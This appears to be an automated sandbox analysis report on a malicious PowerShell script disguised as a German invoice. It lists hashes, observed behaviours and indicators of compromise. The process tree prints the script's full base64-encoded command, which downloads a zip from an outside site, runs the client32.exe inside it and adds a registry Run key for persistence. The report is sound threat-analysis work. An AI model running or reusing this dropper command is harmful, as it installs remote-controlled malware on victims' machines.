Analysis
-
max time kernel
300s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-de -
resource tags
arch:x64arch:x86image:win10v2004-20230220-delocale:de-deos:windows10-2004-x64systemwindows -
submitted
14-04-2023 11:38
Static task
static1
Behavioral task
behavioral1
Sample
Rechnung tfdp.bat
Resource
win10v2004-20230221-de
windows10-2004-x64
4 signatures
300 seconds
Behavioral task
behavioral2
Sample
Rechnungs/SM.ps1
Resource
win10v2004-20230220-de
windows10-2004-x64
9 signatures
300 seconds
General
-
Target
Rechnungs/SM.ps1
-
Size
1KB
-
MD5
28ac93cb29f22234f09d8dd8ae2ba8d9
-
SHA1
eb6eb0a906652ca447d5db48a1158c0dab36b488
-
SHA256
445da7c0f861bca8d8432bf693748870d4bcba3c2d1dcaebecb833fb7b435840
-
SHA512
092a31e212dc9be38a63ea8970db8cca0a0df58f4f097e9e1cea7b6b6dd6e411a4e262ef0cd48328069af25c82d8b632f9c7eaa34a9c3acce0929964505d0be0
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://this-is-vip.site/trs.zip
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate\\client32.exe" powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1576 powershell.exe 1576 powershell.exe 3196 powershell.exe 3196 powershell.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4160 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 4160 taskmgr.exe Token: SeSystemProfilePrivilege 4160 taskmgr.exe Token: SeCreateGlobalPrivilege 4160 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe 4160 taskmgr.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1576 wrote to memory of 3196 1576 powershell.exe 81 PID 1576 wrote to memory of 3196 1576 powershell.exe 81
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Rechnungs\SM.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACIAaAB0AHQAcABzADoALwAvAHQAaABpAHMALQBpAHMALQB2AGkAcAAuAHMAaQB0AGUALwB0AHIAcwAuAHoAaQBwACIAOwAgACQAcABhAHQAaAA9ACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACsAIgBcAHQAcgB0AC4AegBpAHAAIgA7ACAAJABwAHoAaQBwAD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAiAFwATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQAiADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAALgBcAHQAcgB0AC4AegBpAHAAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJABwAHoAaQBwADsAIAAkAEYATwBMAEQAPQBHAGUAdAAtAEkAdABlAG0AIAAkAHAAegBpAHAAIAAtAEYAbwByAGMAZQA7ACAAJABGAE8ATABEAC4AYQB0AHQAcgBpAGIAdQB0AGUAcwA9ACcASABpAGQAZABlAG4AJwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABwAGEAdABoADsAIABjAGQAIAAkAHAAegBpAHAAOwAgAHMAdABhAHIAdAAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIAAkAGYAcwB0AHIAPQAkAHAAegBpAHAAKwAiAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQAiACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAOwA=2⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4160
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57f3eefe85bfa5a7893d2fd007bfc8695
SHA106be01e43200fe7ed58abd49a0477a52aece68ab
SHA25663389a084cd07bfae485891e3639843c77c6e870124a84f41568c824522751c7
SHA51243fd1dc2ab3cd21865e6d03b8e0494d6924fdd4056ea6b60c41638dd57dd246168a4e1652eaa005c3f95cb95a8d07bfcbf41c9df81f568278939a100dda006a0
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82